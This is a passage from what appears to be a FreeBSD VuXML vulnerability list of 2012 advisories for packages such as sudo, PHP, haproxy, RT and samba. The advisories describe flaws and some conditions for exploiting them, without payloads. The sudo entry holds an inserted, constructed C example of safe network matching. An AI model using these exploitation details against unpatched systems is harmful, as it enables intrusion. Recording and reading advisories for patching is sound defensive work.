<url>http://git.postgresql.org/gitweb/?p=postgresql.git;a=patch;h=932ded2ed51e8333852e370c7a6dad75d9f236f9</url>
</references>
<dates>
<discovery>2012-05-30</discovery>
<entry>2012-05-30</entry>
<modified>2012-05-31</modified>
</dates>
</vuln>
<vuln vid="47f13540-c4cb-4971-8dc6-28d0dabfd9cd">
<topic>nut -- upsd can be remotely crashed</topic>
<affects>
<package>
<name>nut</name>
<range><ge>2.4.0</ge><le>2.6.3</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Networkupstools project reports:</p>
<blockquote cite="http://trac.networkupstools.org/projects/nut/changeset/3633">
<p>NUT server (upsd), from versions 2.4.0 to 2.6.3, is exposed to
crashes when receiving random data from the network.</p>
<p>This issue is related to the way NUT parses characters, especially
from the network. Non-printable characters were missed by string
operations (such as strlen), but still copied to the buffer, causing
an overflow.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2944</cvename>
<url>http://www.mail-archive.com/debian-bugs-dist@lists.debian.org/msg1027934.html</url>
<url>http://trac.networkupstools.org/projects/nut/changeset/3633</url>
</references>
<dates>
<discovery>2012-05-30</discovery>
<entry>2012-05-30</entry>
</dates>
</vuln>
<vuln vid="359f615d-a9e1-11e1-8a66-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk16</name>
<range><gt>1.6.*</gt><le>1.6.2.24</le></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.12.1</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.4.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Remote crash vulnerability in IAX2 channel driver.</p>
<p>Skinny Channel Driver Remote Crash Vulnerability</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2947</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-007.html</url>
<cvename>CVE-2012-2948</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-008.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-05-29</discovery>
<entry>2012-05-29</entry>
<modified>2012-05-29</modified>
</dates>
</vuln>
<vuln vid="617959ce-a5f6-11e1-a284-0023ae8e59f0">
<topic>haproxy -- buffer overflow</topic>
<affects>
<package>
<name>haproxy</name>
<range><lt>1.4.21</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>HAProxy reports:</p>
<blockquote cite="http://haproxy.1wt.eu/news.html">
<p>A flaw was reported in HAProxy where, due to a boundary error
when copying data into the trash buffer, an external attacker could
cause a buffer overflow. Exploiting this flaw could lead to the
execution of arbitrary code; however, it requires non-default settings
for the global.tune.bufsize configuration option (must be set to a
value greater than the default), and also that header rewriting is
enabled (via, for example, the regrep or rsprep directives).
This flaw is reported against 1.4.20, prior versions may also be
affected.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2391</cvename>
<url>https://secunia.com/advisories/49261/</url>
<url>http://haproxy.1wt.eu/download/1.4/src/CHANGELOG</url>
<url>http://haproxy.1wt.eu/git?p=haproxy-1.4.git;a=commit;h=30297cb17147a8d339eb160226bcc08c91d9530b</url>
<url>http://haproxy.1wt.eu/news.html</url>
</references>
<dates>
<discovery>2012-05-21</discovery>
<entry>2012-05-24</entry>
<modified>2012-05-29</modified>
</dates>
</vuln>
<vuln vid="e0a969e4-a512-11e1-90b4-e0cb4e266481">
<topic>RT -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>rt40</name>
<range><ge>4.0</ge><lt>4.0.6</lt></range>
</package>
<package>
<name>rt38</name>
<range><lt>3.8.12</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>BestPractical report:</p>
<blockquote cite="http://blog.bestpractical.com/2012/05/security-vulnerabilities-in-rt.html">
<p>Internal audits of the RT codebase have uncovered a
number of security vulnerabilities in RT. We are releasing
versions 3.8.12 and 4.0.6 to resolve these vulnerabilities,
as well as patches which apply atop all released versions of
3.8 and 4.0.</p>
<p>The vulnerabilities addressed by 3.8.12, 4.0.6, and the
below patches include the following:</p>
<p>The previously released tool to upgrade weak password
hashes as part of CVE-2011-0009 was an incomplete fix and
failed to upgrade passwords of disabled users.</p>
<p>RT versions 3.0 and above contain a number of cross-site
scripting (XSS) vulnerabilities which allow an attacker to
run JavaScript with the user's credentials. CVE-2011-2083 is
assigned to this vulnerability.</p>
<p>RT versions 3.0 and above are vulnerable to multiple
information disclosure vulnerabilities. This includes the
ability for privileged users to expose users' previous
password hashes -- this vulnerability is particularly
dangerous given RT's weak hashing previous to the fix in
CVE-2011-0009. A separate vulnerability allows privileged
users to obtain correspondence history for any ticket in
RT. CVE-2011-2084 is assigned to this vulnerability.</p>
<p>All publicly released versions of RT are vulnerable to
cross-site request forgery (CSRF). CVE-2011-2085 is assigned
to this vulnerability.</p>
<p>We have also added a separate configuration option
($RestrictLoginReferrer) to prevent login CSRF, a different
class of CSRF attack.</p>
<p>RT versions 3.6.1 and above are vulnerable to a remote
execution of code vulnerability if the optional VERP
configuration options ($VERPPrefix and $VERPDomain) are
enabled. RT 3.8.0 and higher are vulnerable to a limited
remote execution of code which can be leveraged for
privilege escalation. RT 4.0.0 and above contain a
vulnerability in the global $DisallowExecuteCode option,
allowing sufficiently privileged users to still execute code
even if RT was configured to not allow it. CVE-2011-4458 is
assigned to this set of vulnerabilities.</p>
<p>RT versions 3.0 and above may, under some circumstances,
still respect rights that a user only has by way of a
currently-disabled group. CVE-2011-4459 is assigned to this
vulnerability.</p>
<p>RT versions 2.0 and above are vulnerable to a SQL
injection attack, which allows privileged users to obtain
arbitrary information from the database. CVE-2011-4460 is
assigned to this vulnerability.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-0009</cvename>
<cvename>CVE-2011-2082</cvename>
<cvename>CVE-2011-2083</cvename>
<cvename>CVE-2011-2084</cvename>
<cvename>CVE-2011-2085</cvename>
<cvename>CVE-2011-4458</cvename>
<cvename>CVE-2011-4459</cvename>
<cvename>CVE-2011-4460</cvename>
<url>http://blog.bestpractical.com/2012/05/security-vulnerabilities-in-rt.html</url>
</references>
<dates>
<discovery>2012-05-22</discovery>
<entry>2012-05-23</entry>
</dates>
</vuln>
<vuln vid="78c39232-a345-11e1-9d81-d0df9acfd7e5">
<topic>sympa -- Multiple Security Bypass Vulnerabilities</topic>
<affects>
<package>
<name>sympa</name>
<range><lt>6.1.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia team reports:</p>
<blockquote cite="http://secunia.com/advisories/49045/">
<p>Multiple vulnerabilities have been reported in Sympa, which can be
exploited by malicious people to bypass certain security
restrictions.</p>
<p>The vulnerabilities are caused due to the application allowing
access to archive functions without checking credentials. This can
be exploited to create, download, and delete an archive.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2352</cvename>
<url>http://secunia.com/advisories/49045/</url>
</references>
<dates>
<discovery>2012-05-14</discovery>
<entry>2012-05-21</entry>
</dates>
</vuln>
<vuln vid="495b46fd-a30f-11e1-82c9-d0df9acfd7e5">
<topic>foswiki -- Script Insertion Vulnerability via unchecked user registration fields</topic>
<affects>
<package>
<name>foswiki</name>
<range><lt>1.1.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Foswiki team reports:</p>
<blockquote cite="http://foswiki.org/Support/SecurityAlert-CVE-2012-1004">
<p>When a new user registers, the new user can add arbitrary HTML and
script code into the user topic which is generated by the
RegistrationAgent via standard registration fields such as
"FirstName" or "OrganisationName".</p>
<p>By design, Foswiki's normal editing features allow arbitrary HTML
markup, including script code, to be inserted into any topic anyway,
assuming the authenticated user has CHANGE permission - which is the
case on many Foswiki sites. However, the assumption that only
authenticated users with CHANGE permission may create script content
is false if new users exploit the vulnerability detailed in this
alert to manipulate the registration agent into creating that
content for them.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1004</cvename>
<url>http://foswiki.org/Support/SecurityAlert-CVE-2012-1004</url>
</references>
<dates>
<discovery>2012-04-13</discovery>
<entry>2012-05-21</entry>
</dates>
</vuln>
<vuln vid="b8ae4659-a0da-11e1-a294-bcaec565249c">
<topic>libxml2 -- An off-by-one out-of-bounds write by XPointer</topic>
<affects>
<package>
<name>libxml2</name>
<range><lt>2.7.8_3</lt></range>
</package>
<package>
<name>linux-f10-libxml2</name>
<range><lt>2.7.8_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Google chrome team reports:</p>
<blockquote cite="http://googlechromereleases.blogspot.com/2012/05/stable-channel-update.html">
<p>An off-by-one out-of-bounds write flaw was found in the way libxml, a library
for providing XML and HTML support, evaluated certain XPointer parts (XPointer
is used by libxml to include only the part from the returned XML document, that
can be accessed using the XPath expression given with the XPointer). A remote
attacker could provide a specially-crafted XML file which, once opened in an
application linked against libxml, would cause that application to crash or,
potentially, to execute arbitrary code with the privileges of the user running
the application.</p>
<p>Note: The flaw to be exploited requires the particular application, linked
against libxml, to use the XPointer evaluation functionality.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3102</cvename>
<url>http://googlechromereleases.blogspot.com/2012/05/stable-channel-update.html</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3102</url>
</references>
<dates>
<discovery>2012-05-15</discovery>
<entry>2012-05-18</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="f5f00804-a03b-11e1-a284-0023ae8e59f0">
<topic>inspircd -- buffer overflow</topic>
<affects>
<package>
<name>inspircd</name>
<range><ge>1.2</ge><lt>1.2.9</lt></range>
<range><ge>2.0</ge><lt>2.0.5_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>InspIRCd reports:</p>
<blockquote cite="http://inspircd.github.com/">
<p>InspIRCd contains a heap corruption vulnerability that exists in the
dns.cpp code. The res[] buffer is allocated on the heap and can be
overflowed. The res[] buffer can be exploited during its deallocation.
The number of overflowed bytes can be controlled with DNS compression
features.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1836</cvename>
<url>http://inspircd.github.com/</url>
</references>
<dates>
<discovery>2012-03-19</discovery>
<entry>2012-05-17</entry>
<modified>2012-06-21</modified>
</dates>
</vuln>
<vuln vid="aa71daaa-9f8c-11e1-bd0a-0082a0c18826">
<topic>pidgin-otr -- format string vulnerability</topic>
<affects>
<package>
<name>pidgin-otr</name>
<range><lt>3.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The authors report:</p>
<blockquote cite="http://www.cypherpunks.ca/otr/">
<p>Versions 3.2.0 and earlier of the pidgin-otr plugin contain
a format string security flaw. This flaw could potentially be
exploited by a remote attacker to cause arbitrary code to be
executed on the user's machine.</p>
<p>The flaw is in pidgin-otr, not in libotr. Other applications
that use libotr are not affected.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2369</cvename>
<url>http://www.cypherpunks.ca/otr/</url>
</references>
<dates>
<discovery>2012-05-16</discovery>
<entry>2012-05-16</entry>
</dates>
</vuln>
<vuln vid="b3435b68-9ee8-11e1-997c-002354ed89bc">
<topic>sudo -- netmask vulnerability</topic>
<affects>
<package>
<name>sudo</name>
<range><le>1.8.4_1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Todd Miller reports:</p>
<blockquote cite="http://www.sudo.ws/sudo/alerts/netmask.html">
<p>Sudo supports granting access to commands on a per-host basis.
The host specification may be in the form of a host name, a
netgroup, an IP address, or an IP network (an IP address with an
associated netmask).</p>
<p>When IPv6 support was added to sudo, a bug was introduced that
caused the IPv6 network matching code to be called when an IPv4
network address does not match. Depending on the value of the
uninitialized portion of the IPv6 address, it is possible for the
IPv4 network number to match when it should not. This bug only
affects IP network matching and does not affect simple IP address
matching.</p>
<p>The reported configuration that exhibited the bug was an
LDAP-based sudo installation where the sudoRole object contained
multiple sudoHost entries, each containing a different IPv4
network. File-based sudoers should be affected as well as the
same matching code is used.</p>
</blockquote>
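<p>The advisory above describes network matching that falls through from the IPv4 comparison into the IPv6 comparison, so partly uninitialised address bytes decide the result. The C program that follows is an added example written for this entry, not sudo's own code: a host/network matcher that zeroes its buffers before parsing with inet_pton, refuses to compare across address families, and compares only the bits covered by the prefix length. The function names (parse_net, addr_in_net) and the probe addresses in main are this example's own constructed choices.</p>
<![CDATA[
```c
/* Added example (not sudo's code): a per-host network matcher that checks the
 * address family before comparing, so an IPv4 address that fails to match an
 * IPv4 network is never re-compared by IPv6 code over bytes that were never
 * initialised (the bug class described for CVE-2012-2337). */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>

struct ipnet {
    int family;             /* AF_INET or AF_INET6 */
    unsigned char addr[16]; /* network address, zero-padded to 16 bytes */
    unsigned prefix;        /* prefix length in bits */
};

/* Parse "10.0.0.0/24", "2001:db8::/32" or a bare address. Returns 0 on success. */
static int parse_net(const char *spec, struct ipnet *net)
{
    char buf[64];
    const char *slash = strchr(spec, '/');
    size_t len = slash ? (size_t)(slash - spec) : strlen(spec);
    if (len >= sizeof buf)
        return -1;
    memcpy(buf, spec, len);
    buf[len] = '\0';
    memset(net, 0, sizeof *net); /* every byte is defined before any compare */
    if (inet_pton(AF_INET, buf, net->addr) == 1) {
        net->family = AF_INET;
        net->prefix = slash ? (unsigned)atoi(slash + 1) : 32;
        return net->prefix > 32 ? -1 : 0;
    }
    if (inet_pton(AF_INET6, buf, net->addr) == 1) {
        net->family = AF_INET6;
        net->prefix = slash ? (unsigned)atoi(slash + 1) : 128;
        return net->prefix > 128 ? -1 : 0;
    }
    return -1;
}

/* 1 if host lies inside netspec, 0 if it does not or either side is unparsable. */
int addr_in_net(const char *host, const char *netspec)
{
    struct ipnet net, h;
    if (parse_net(netspec, &net) != 0 || parse_net(host, &h) != 0)
        return 0;
    if (h.family != net.family) /* never fall through to the other family */
        return 0;
    unsigned full = net.prefix / 8, rem = net.prefix % 8;
    if (memcmp(h.addr, net.addr, full) != 0)
        return 0;
    if (rem == 0)
        return 1;
    unsigned char mask = (unsigned char)(0xffu << (8 - rem));
    return (h.addr[full] & mask) == (net.addr[full] & mask);
}

int main(void)
{
    /* Constructed probes: note that the IPv4-mapped IPv6 form must not match. */
    const char *probes[] = { "10.0.0.5", "10.0.1.5", "192.168.1.1",
                             "2001:db8::1", "::ffff:10.0.0.5" };
    const char *nets[] = { "10.0.0.0/24", "192.168.0.0/16", "2001:db8::/32" };
    for (size_t i = 0; i < sizeof probes / sizeof *probes; i++)
        for (size_t j = 0; j < sizeof nets / sizeof *nets; j++)
            printf("%-16s in %-16s : %s\n", probes[i], nets[j],
                   addr_in_net(probes[i], nets[j]) ? "yes" : "no");
    return 0;
}
```
]]>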
</body>
</description>
<references>
<cvename>CVE-2012-2337</cvename>
<url>http://www.sudo.ws/sudo/alerts/netmask.html</url>
</references>
<dates>
<discovery>2012-05-16</discovery>
<entry>2012-05-16</entry>
</dates>
</vuln>
<vuln vid="dba5d1c9-9f29-11e1-b511-003067c2616f">
<topic>OpenSSL -- DTLS and TLS 1.1, 1.2 denial of service</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.1_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OpenSSL security team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120510.txt">
<p>A flaw in the OpenSSL handling of CBC mode ciphersuites in TLS 1.1, 1.2 and
DTLS can be exploited in a denial of service attack on both clients and
servers.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2333</cvename>
<url>http://www.openssl.org/news/secadv_20120510.txt</url>
</references>
<dates>
<discovery>2012-05-10</discovery>
<entry>2012-05-10</entry>
</dates>
</vuln>
<vuln vid="6601127c-9e09-11e1-b5e0-000c299b62e1">
<topic>socat -- Heap-based buffer overflow</topic>
<affects>
<package>
<name>socat</name>
<range><lt>1.7.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The socat development team reports:</p>
<blockquote cite="http://www.dest-unreach.org/socat/contrib/socat-secadv3.html">
<p>This vulnerability can be exploited when socat is invoked with the
READLINE address (this is usually only used interactively) without
option "prompt" and without option "noprompt" and an attacker succeeds
to provide malicious data to the other (arbitrary) address that is then
transferred by socat to the READLINE address for output.</p>
<p>Successful exploitation may allow an attacker to execute arbitrary
code with the privileges of the socat process.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0219</cvename>
<url>http://www.dest-unreach.org/socat/contrib/socat-secadv3.html</url>
</references>
<dates>
<discovery>2012-05-14</discovery>
<entry>2012-05-14</entry>
</dates>
</vuln>
<vuln vid="59b68b1e-9c78-11e1-b5e0-000c299b62e1">
<topic>php -- multiple vulnerabilities</topic>
<affects>
<package>
<name>php5</name>
<range><gt>5.4</gt><lt>5.4.3</lt></range>
<range><lt>5.3.13</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.13</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PHP Development Team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-05-08-1">
<p>The releases of PHP 5.3.13 and 5.4.3 complete a fix for the
vulnerability in CGI-based setups as originally described in
CVE-2012-1823. (CVE-2012-2311)</p>
<p>Note: mod_php and php-fpm are not vulnerable to this attack.</p>
<p>PHP 5.4.3 fixes a buffer overflow vulnerability in the
apache_request_headers() (CVE-2012-2329).</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1823</cvename>
<cvename>CVE-2012-2311</cvename>
<cvename>CVE-2012-2329</cvename>
</references>
<dates>
<discovery>2012-05-08</discovery>
<entry>2012-05-12</entry>
</dates>
</vuln>
<vuln vid="64f8b72d-9c4e-11e1-9c94-000bcdf0a03b">
<topic>libpurple -- Invalid memory dereference in the XMPP protocol plug-in by processing a series of specially-crafted file transfer requests</topic>
<affects>
<package>
<name>libpurple</name>
<range><lt>2.10.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Pidgin reports:</p>
<blockquote cite="http://pidgin.im/news/security/?id=62">
<p>A series of specially crafted file transfer requests can cause clients to reference invalid memory. The user must have accepted one of the file transfer requests.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2214</cvename>
</references>
<dates>
<discovery>2012-05-06</discovery>
<entry>2012-05-12</entry>
</dates>
</vuln>
<vuln vid="0d3547ab-9b69-11e1-bdb1-525401003090">
<topic>PivotX -- 'ajaxhelper.php' Cross Site Scripting Vulnerability</topic>
<affects>
<package>
<name>pivotx</name>
<range><le>2.3.2</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>High-Tech Bridge reports:</p>
<blockquote cite="https://www.htbridge.com/advisory/HTB23087">
<p>Input passed via the "file" GET parameter to
/pivotx/ajaxhelper.php is not properly sanitised before
being returned to the user. This can be exploited to
execute arbitrary HTML and script code in administrator's
browser session in context of the affected website.</p>
</blockquote>
</body>
</description>
<references>
<bid>52159</bid>
<cvename>CVE-2012-2274</cvename>
<url>https://www.htbridge.com/advisory/HTB23087</url>
</references>
<dates>
<discovery>2012-05-09</discovery>
<entry>2012-05-12</entry>
<modified>2012-05-14</modified>
</dates>
</vuln>
<vuln vid="b91234e7-9a8b-11e1-b666-001636d274f3">
<topic>NVIDIA UNIX driver -- access to arbitrary system memory</topic>
<affects>
<package>
<name>nvidia-driver</name>
<range><gt>173.14.35_2</gt><lt>295.71</lt></range>
<range><gt>96.43.20_3</gt><lt>173.14.35</lt></range>
<range><gt>71.86.15_3</gt><lt>96.43.20_2</lt></range>
<range><lt>71.86.15_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>NVIDIA Unix security team reports:</p>
<blockquote cite="http://nvidia.custhelp.com/app/answers/detail/a_id/3109">
<p>Security vulnerability CVE-2012-0946 in the NVIDIA UNIX driver
was disclosed to NVIDIA on March 20th, 2012. The vulnerability
makes it possible for an attacker who has read and write access
to the GPU device nodes to reconfigure GPUs to gain access to
arbitrary system memory. NVIDIA is not aware of any reports of
this vulnerability, outside of the disclosure which was made
privately to NVIDIA.</p>
<p>NVIDIA has identified the root cause of the vulnerability and
has released updated drivers which close it. [NVIDIA encourages]
all users with Geforce 8 or newer, G80 Quadro or newer, and all
Tesla GPUs to update their drivers to 295.40 or later.</p>
</blockquote>
<p>Later, it was additionally discovered that a similar exploit could
be achieved by remapping the VGA window:</p>
<blockquote cite="http://nvidia.custhelp.com/app/answers/detail/a_id/3140">
<p>NVIDIA received notification of a security exploit that uses
NVIDIA UNIX device files to map and program registers to redirect
the VGA window. Through the VGA window, the exploit can access
any region of physical system memory. This arbitrary memory
access can be further exploited, for example, to escalate user
privileges.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0946</cvename>
<cvename>CVE-2012-4225</cvename>
</references>
<dates>
<discovery>2012-03-20</discovery>
<entry>2012-05-10</entry>
<modified>2012-09-12</modified>
</dates>
</vuln>
<vuln vid="3d55b961-9a2e-11e1-a2ef-001fd0af1a4c">
<topic>rubygem-mail -- multiple vulnerabilities</topic>
<affects>
<package>
<name>rubygem-mail</name>
<range><lt>2.4.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>rubygem-mail -- multiple vulnerabilities</p>
<blockquote cite="http://seclists.org/oss-sec/2012/q2/190">
<p>Two issues were fixed. They are a file system traversal in file_delivery method and arbitrary command execution when using exim or sendmail from the command line.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2139</cvename>
<cvename>CVE-2012-2140</cvename>
<url>http://seclists.org/oss-sec/2012/q2/190</url>
</references>
<dates>
<discovery>2012-03-14</discovery>
<entry>2012-05-09</entry>
</dates>
</vuln>
<vuln vid="a1d0911f-987a-11e1-a2ef-001fd0af1a4c">
<topic>node -- private information disclosure</topic>
<affects>
<package>
<name>node</name>
<name>node-devel</name>
<range><lt>0.6.17</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Private information disclosure</p>
<blockquote cite="http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/">
<p>An attacker can cause private information disclosure.</p>
</blockquote>
</body>
</description>
<references>
<url>http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/</url>
</references>
<dates>
<discovery>2012-04-17</discovery>
<entry>2012-05-07</entry>
</dates>
</vuln>
<vuln vid="725ab25a-987b-11e1-a2ef-001fd0af1a4c">
<topic>p5-Config-IniFiles -- unsafe temporary file creation</topic>
<affects>
<package>
<name>p5-Config-IniFiles</name>
<range><lt>2.71</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Unsafe Temporary file creation</p>
<blockquote cite="https://bitbucket.org/shlomif/perl-config-inifiles/changeset/a08fa26f4f59">
<p>Config::IniFiles used a predictable name for its temporary
file without opening it correctly.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2451</cvename>
<url>https://bitbucket.org/shlomif/perl-config-inifiles/changeset/a08fa26f4f59</url>
</references>
<dates>
<discovery>2012-05-02</discovery>
<entry>2012-05-07</entry>
</dates>
</vuln>
<vuln vid="60de13d5-95f0-11e1-806a-001143cd36d8">
<topic>php -- vulnerability in certain CGI-based setups</topic>
<affects>
<package>
<name>php5</name>
<range><gt>5.4</gt><lt>5.4.2</lt></range>
<range><lt>5.3.12</lt></range>
</package>
<package>
<name>php53</name>
<range><lt>5.3.12</lt></range>
</package>
<package>
<name>php4</name>
<range><lt>4.4.10</lt></range>
</package>
<package>
<name>php52</name>
<range><lt>5.2.17_8</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>php development team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-05-03-1">
<p>Security Enhancements and Fixes in PHP 5.3.12:</p>
<ul>
<li>Initial fix for cgi-bin ?-s cmdarg parse issue
(CVE-2012-1823)</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1823</cvename>
</references>
<dates>
<discovery>2012-05-03</discovery>
<entry>2012-05-05</entry>
</dates>
</vuln>
<vuln vid="18dffa02-946a-11e1-be9d-000c29cc39d3">
<topic>WebCalendar -- multiple vulnerabilities</topic>
<affects>
<package>
<name>WebCalendar-devel</name>
<range><le>1.2.4</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Hanno Boeck reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/04/28/1">
<p>Fixes [are now available] for various security vulnerabilities
including LFI (local file inclusion), XSS (cross site scripting)
and others.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1495</cvename>
<cvename>CVE-2012-1496</cvename>
<url>http://packetstormsecurity.org/files/112332/WebCalendar-1.2.4-Remote-Code-Execution.html</url>
<url>http://packetstormsecurity.org/files/112323/WebCalendar-1.2.4-Pre-Auth-Remote-Code-Injection.html</url>
<url>http://archives.neohapsis.com/archives/bugtraq/2012-04/0182.html</url>
</references>
<dates>
<discovery>2012-04-28</discovery>
<entry>2012-05-02</entry>
</dates>
</vuln>
<vuln vid="2cde1892-913e-11e1-b44c-001fd0af1a4c">
<topic>php -- multiple vulnerabilities</topic>
<affects>
<package>
<name>php53</name>
<range><lt>5.3.11</lt></range>
</package>
<package>
<name>php5</name>
<range><lt>5.3.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>php development team reports:</p>
<blockquote cite="http://www.php.net/archive/2012.php#id2012-04-26-1">
<p>Security Enhancements for both PHP 5.3.11 and PHP 5.4.1:</p>
<ul>
<li>Insufficient validating of upload name leading to corrupted $_FILES indices. (CVE-2012-1172) </li>
<li>Add open_basedir checks to readline_write_history and readline_read_history.</li>
</ul>
<p>Security Enhancements for PHP 5.3.11 only:</p>
<ul>
<li>Regression in magic_quotes_gpc fix for CVE-2012-0831.</li>
</ul>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0831</cvename>
<cvename>CVE-2012-1172</cvename>
<url>http://www.php.net/archive/2012.php#id2012-04-26-1</url>
</references>
<dates>
<discovery>2012-03-01</discovery>
<entry>2012-04-28</entry>
<modified>2012-05-04</modified>
</dates>
</vuln>
<vuln vid="0fa15e08-92ec-11e1-a94a-00215c6a37bb">
<topic>samba -- incorrect permission checks vulnerability</topic>
<affects>
<package>
<name>samba34</name>
<range><gt>3.4.*</gt><lt>3.4.17</lt></range>
</package>
<package>
<name>samba35</name>
<range><gt>3.5.*</gt><lt>3.5.15</lt></range>
</package>
<package>
<name>samba36</name>
<range><gt>3.6.*</gt><lt>3.6.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Samba project reports:</p>
<blockquote cite="http://www.samba.org/samba/security/CVE-2012-2111">
<p>Samba versions 3.4.x to 3.6.4 inclusive are affected
by a vulnerability that allows arbitrary users to modify
privileges on a file server.</p>
<p>Security checks were incorrectly applied to the Local
Security Authority (LSA) remote procedure calls (RPC)
CreateAccount, OpenAccount, AddAccountRights and
RemoveAccountRights allowing any authenticated user
to modify the privileges database.</p>
<p>This is a serious error, as it means that authenticated
users can connect to the LSA and grant themselves the
"take ownership" privilege. This privilege is used by the
smbd file server to grant the ability to change ownership
of a file or directory which means users could take ownership
of files or directories they do not own.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2111</cvename>
</references>
<dates>
<discovery>2012-04-30</discovery>
<entry>2012-04-30</entry>
</dates>
</vuln>
<vuln vid="b428e6b3-926c-11e1-8d7b-003067b2972c">
<topic>portupgrade-devel -- lack of distfile checksums</topic>
<affects>
<package>
<name>portupgrade-devel</name>
<range><lt>0,3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Ports security team reports:</p>
<p>The portupgrade-devel port fetched directly from a git
repository without checking against a known good
SHA hash. This means that it is possible that packages
built using this port may not match the one vetted
by the maintainer. Users are advised to rebuild
portupgrade-devel from known good sources.</p>
</body>
</description>
<references>
<mlist>http://web.archiveorange.com/archive/v/6ETvLYPz7CfFT9tiHKiI</mlist>
<mlist>http://www.freebsd.org/cgi/getmsg.cgi?fetch=100677+0+/usr/local/www/db/text/2012/cvs-ports/20120506.cvs-ports</mlist>
</references>
<dates>
<discovery>2012-04-30</discovery>
<entry>2012-04-30</entry>
<modified>2012-05-06</modified>
</dates>
</vuln>
<vuln vid="5d85976a-9011-11e1-b5e0-000c299b62e1">
<topic>net-snmp -- Remote DoS</topic>
<affects>
<package>
<name>net-snmp</name>
<range><lt>5.7.1_7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Red Hat Security Response Team reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=815813">
<p>An array index error, leading to an out-of-bounds heap-based buffer read flaw, was
found in the way the net-snmp agent performed lookups in the
extension table. When certain MIB subtrees were handled by the
extend directive, a remote attacker (having read privileges to the
subtree) could use this flaw to cause a denial of service condition
via an SNMP GET request involving a non-existent extension table
entry.</p>
